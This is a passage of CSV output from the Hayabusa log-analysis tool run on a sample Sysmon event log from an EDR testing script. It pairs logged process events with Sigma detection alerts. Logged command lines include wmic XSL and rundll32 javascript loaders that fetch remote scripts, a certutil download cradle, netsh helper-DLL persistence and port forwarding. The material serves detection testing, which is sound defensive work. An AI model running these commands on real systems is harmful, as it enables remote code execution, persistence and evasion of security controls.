Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:53.776 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4260 | PGUID: 747F3D96-6641-5D3F-0000-0010A38C8A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:53.843 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 1516 | PGUID: 
747F3D96-6641-5D3F-0000-001066918A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:54.246 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl"" | Process: C:\Windows\System32\wbem\WMIC.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl"" | LID: 0x413182 | PID: 4896 | PGUID: 747F3D96-6642-5D3F-0000-0010F69D8A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:54.246 +09:00,MSEDGEWIN10,1,medium,Evas | Exec,SquiblyTwo,,../hayabusa-rules/sigma/process_creation/proc_creation_win_bypass_squiblytwo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:54.246 +09:00,MSEDGEWIN10,1,medium,Exec,Suspicious WMI Reconnaissance,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmic_reconnaissance.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:54.246 +09:00,MSEDGEWIN10,1,medium,Evas,XSL Script Processing,,../hayabusa-rules/sigma/process_creation/proc_creation_win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:54.630 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Microsoft\Windows\INetCache\IE\LQ86GWLO\Wmic_calc[1].xsl | Process: C:\Windows\System32\Wbem\WMIC.exe | PID: 4896 | PGUID: 
747F3D96-6642-5D3F-0000-0010F69D8A00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:54.630 +09:00,MSEDGEWIN10,11,high,,Windows Shell File Write to Suspicious Folder,,../hayabusa-rules/sigma/file_event/file_event_win_shell_write_susp_directory.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:54.718 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl"" | LID: 0x413182 | PID: 5728 | PGUID: 747F3D96-6642-5D3F-0000-0010D6C98A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:56.665 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49830 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\wbem\WMIC.exe | PID: 4896 | PGUID: 747F3D96-6642-5D3F-0000-0010F69D8A00,../hayabusa-rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:58.256 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5084 | PGUID: 
747F3D96-6646-5D3F-0000-0010E32E8B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:58.256 +09:00,MSEDGEWIN10,1,medium,Disc | CredAccess,Capture a Network Trace with netsh.exe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_netsh_packet_capture.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:58.286 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c netsh trace show status | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4148 | PGUID: 747F3D96-6646-5D3F-0000-0010A7318B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:58.485 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c netsh.exe add helper AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 3824 | PGUID: 747F3D96-6646-5D3F-0000-001051388B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:58.543 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6760 | PGUID: 
747F3D96-6646-5D3F-0000-001029398B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:58.598 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 3868 | PGUID: 747F3D96-6646-5D3F-0000-0010A7398B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:58.683 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c netsh trace stop | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6232 | PGUID: 747F3D96-6646-5D3F-0000-0010913A8B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:00.330 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: netsh trace show status | Process: C:\Windows\System32\netsh.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c netsh trace show status | LID: 0x413182 | PID: 5760 | PGUID: 747F3D96-6647-5D3F-0000-0010F4648B00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:00.420 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl | Process: C:\Windows\System32\netsh.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c netsh trace start capture=yes filemode=append 
persistent=yes tracefile=trace.etl | LID: 0x413182 | PID: 5056 | PGUID: 747F3D96-6647-5D3F-0000-0010AE6E8B00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:00.420 +09:00,MSEDGEWIN10,1,medium,Disc | CredAccess,Capture a Network Trace with netsh.exe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_netsh_packet_capture.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:00.434 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: netsh trace stop | Process: C:\Windows\System32\netsh.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c netsh trace stop | LID: 0x413182 | PID: 4568 | PGUID: 747F3D96-6647-5D3F-0000-001005738B00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:00.442 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0 | Process: C:\Windows\System32\netsh.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0 | LID: 0x413182 | PID: 5048 | PGUID: 747F3D96-6647-5D3F-0000-001065758B00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:00.442 +09:00,MSEDGEWIN10,1,medium,LatMov | Evas | C2,Netsh Port Forwarding,,../hayabusa-rules/sigma/process_creation/proc_creation_win_netsh_port_fwd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:00.460 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: netsh interface portproxy add v4tov4 listenport=8080 
listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1 | Process: C:\Windows\System32\netsh.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1 | LID: 0x413182 | PID: 4028 | PGUID: 747F3D96-6647-5D3F-0000-001057768B00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:00.460 +09:00,MSEDGEWIN10,1,medium,LatMov | Evas | C2,Netsh Port Forwarding,,../hayabusa-rules/sigma/process_creation/proc_creation_win_netsh_port_fwd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:00.466 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: netsh.exe add helper AllTheThings.dll | Process: C:\Windows\System32\netsh.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c netsh.exe add helper AllTheThings.dll | LID: 0x413182 | PID: 5236 | PGUID: 747F3D96-6647-5D3F-0000-0010927C8B00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:00.466 +09:00,MSEDGEWIN10,1,high,PrivEsc,Suspicious Netsh DLL Persistence,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_netsh_dll_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:00.731 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 5376 | PGUID: 
747F3D96-6647-5D3F-0000-001052998B00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:00.970 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5256 | PGUID: 747F3D96-6648-5D3F-0000-0010B9AB8B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:01.090 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\dispdiag.exe -out dispdiag_start.dat | Process: C:\Windows\System32\dispdiag.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl | LID: 0x413182 | PID: 3704 | PGUID: 747F3D96-6648-5D3F-0000-001092BB8B00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:05.237 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c rundll32 AllTheThings.dll,EntryPoint | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6836 | PGUID: 747F3D96-664D-5D3F-0000-0010F1498C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:05.252 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 
6056 | PGUID: 747F3D96-664D-5D3F-0000-0010114D8C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:05.502 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 AllTheThings.dll,EntryPoint | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c rundll32 AllTheThings.dll,EntryPoint | LID: 0x413182 | PID: 912 | PGUID: 747F3D96-664D-5D3F-0000-00108D5B8C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:05.542 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 AllTheThings.dll,EntryPoint | Process: C:\Windows\SysWOW64\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: rundll32 AllTheThings.dll,EntryPoint | LID: 0x413182 | PID: 5572 | PGUID: 747F3D96-664D-5D3F-0000-0010BB5D8C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:10.373 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"") | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5844 | PGUID: 747F3D96-6652-5D3F-0000-0010B9708C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:10.373 +09:00,MSEDGEWIN10,1,high,Evas,Rundll32 JS RunHTMLApplication 
Pattern,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_js_runhtmlapplication.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:10.373 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Script in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:10.388 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5268 | PGUID: 747F3D96-6652-5D3F-0000-001059728C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:10.708 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"") | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"") | LID: 0x413182 | PID: 348 | PGUID: 747F3D96-6652-5D3F-0000-001058828C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:10.708 +09:00,MSEDGEWIN10,1,high,Evas,Rundll32 JS RunHTMLApplication 
Pattern,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_js_runhtmlapplication.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:10.708 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Script in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:10.708 +09:00,MSEDGEWIN10,1,high,,Application Executed Non-Executable Extension,,../hayabusa-rules/sigma/process_creation/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:11.501 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"") | LID: 0x413182 | PID: 4888 | PGUID: 747F3D96-6653-5D3F-0000-001083BC8C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:12.352 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:49831 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\rundll32.exe | PID: 348 | PGUID: 747F3D96-6652-5D3F-0000-001058828C00,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:12.352 +09:00,MSEDGEWIN10,3,medium,Evas | Exec,Rundll32 Internet 
Connection,,../hayabusa-rules/sigma/network_connection/sysmon_rundll32_net_connections.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:15.226 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new0ActiveXObject(""WScript.Shell"").run(""calc.exe"",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im rundll32.exe && exit"",0,true);} | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 1808 | PGUID: 747F3D96-6657-5D3F-0000-001029198D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:15.226 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Script in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:15.252 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 2296 | PGUID: 747F3D96-6657-5D3F-0000-0010D01A8D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:15.658 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication 
"";document.write();h=new0ActiveXObject(""WScript.Shell"").run(""calc.exe"",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im rundll32.exe && exit"",0,true);} | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new0ActiveXObject(""WScript.Shell"").run(""calc.exe"",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im rundll32.exe && exit"",0,true);} | LID: 0x413182 | PID: 1004 | PGUID: 747F3D96-6657-5D3F-0000-001011298D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:15.658 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Script in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:15.658 +09:00,MSEDGEWIN10,1,high,,Application Executed Non-Executable Extension,,../hayabusa-rules/sigma/process_creation/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:20.238 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 7088 | PGUID: 
747F3D96-665C-5D3F-0000-0010096B8D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:20.238 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:20.262 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 3076 | PGUID: 747F3D96-665C-5D3F-0000-0010DC6B8D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:20.459 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 | Process: C:\Windows\System32\certutil.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c certutil.exe -urlcache -split -f 